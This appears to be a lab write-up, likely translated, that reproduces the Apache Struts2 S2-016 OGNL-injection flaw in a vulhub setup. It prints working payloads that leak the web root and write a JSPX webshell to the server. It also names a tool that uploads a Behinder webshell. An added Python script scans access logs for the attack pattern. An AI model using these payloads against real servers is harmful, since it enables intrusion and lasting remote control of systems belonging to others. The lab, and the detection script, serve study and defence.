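0X00-Introduction
Every year when the peach blossoms bloom, I think of someone.
s2-016 is kind of interesting; I will add more once I understand the source code.
0X01-Environment setup
Target: CentOS Linux 7
Attacker: Windows Server 2016 && Kali
Environment: vulhub
Project: https://github.com/vulhub/vulhub
To set up vulhub, see: Setting up vulhub on a blank CentOS 7 64-bit (detailed)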
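0X02-Vulnerability description
In Struts2, the DefaultActionMapper class accepts the "action:", "redirect:" and "redirectAction:" prefixes for navigation and redirection, and whatever follows these prefixes is treated as an OGNL expression. Because Struts2 did not filter what follows these prefixes, an OGNL expression can be used to dynamically invoke Java methods and execute arbitrary system commands.
So, a request to http://your-ip:8080/index.action?redirect:<OGNL expression> gets the OGNL expression evaluated.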
0X03-Reproducing the vulnerability
01-Getting the web directory
payload:
redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()}
URL-encoded:
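02-Writing a webshell
The trojan file could not be uploaded: a file can be created, but it has no content. I could not find the cause. It may have been killed, but the lab has no protection software. A friend said there is domain-control protection; I will look into it later.
payload: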
redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath("/")).append(@java.io.File@separator).append("2.jspx").toString()),#b.write(#a.getParameter("t").getBytes()),#b.close(),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println("BINGO"),#genxor.flush(),#genxor.close()}
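0X04-Vulnerability analysis
Omitted
0X05-Checking the logs
docker ps #list containers to get the container ID
docker exec -it ID /bin/bash #enter the container
cd logs #go to the log directory
cat localhost_access_log.2021-12-02.txt #view the log
exit #leave the container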
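A way to search that access log for the request pattern from 0X02, including the URL-encoded form, as an added example that is not part of the original post. It assumes Tomcat's "common" access-log layout; the sample lines are constructed and use a harmless stand-in expression, and names such as scan and SAMPLE_LOG are made up for this example.

```python
import re
from urllib.parse import unquote

# Tomcat "common" layout (assumed): host ident user [time] "request line" status bytes
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+).*" (\d{3})\s')
# A DefaultActionMapper prefix used as a parameter name and followed by an
# OGNL expression opener (${ or %{). Prefix names are case-sensitive.
OGNL_RE = re.compile(r'(?:^|[?&;])(redirectAction|redirect|action):\s*[$%]\{')

# Constructed sample lines (not from a real log); ${1+1} is a harmless stand-in.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Dec/2021:08:15:01 +0000] "GET /index.action HTTP/1.1" 200 1024',
    '198.51.100.7 - - [02/Dec/2021:08:16:10 +0000] "GET /index.action?redirect:${1+1} HTTP/1.1" 302 -',
    '198.51.100.7 - - [02/Dec/2021:08:16:44 +0000] "GET /index.action?'
    '%72%65%64%69%72%65%63%74%3a%24%7b1%2b1%7d HTTP/1.1" 200 12',
    '198.51.100.7 - - [02/Dec/2021:08:17:02 +0000] "GET /index.action?'
    '%2572edirectAction%253a%2525%257b1%257d HTTP/1.1" 200 12',
    '192.0.2.10 - - [02/Dec/2021:08:18:30 +0000] "GET /index.action?next=redirect:home HTTP/1.1" 200 1024',
    '192.0.2.10 - - [02/Dec/2021:08:19:05 +0000] "GET /index.action?redirect:index.jsp HTTP/1.1" 302 -',
]

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded requests look alike."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan(lines):
    """Return one finding per request whose query string has prefix + OGNL opener."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log record in the assumed layout
        host, when, _method, uri, status = m.groups()
        hit = OGNL_RE.search(decode_fully(uri.partition("?")[2]))
        if hit:
            findings.append({"line": number, "host": host, "time": when,
                             "prefix": hit.group(1), "status": int(status)})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The scan covers only what the access log records, which is the request line; the plain redirect:index.jsp request is deliberately not reported because no expression follows the prefix.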
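0X06-Detection with a tool
Tool: https://github.com/Liqunkit/LiqunKit_
Uploading a Behinder webshell: the tool can upload the shell, but when I upload manually the shell's content does not get written, and I don't know why.
Path
Connecting with Behinder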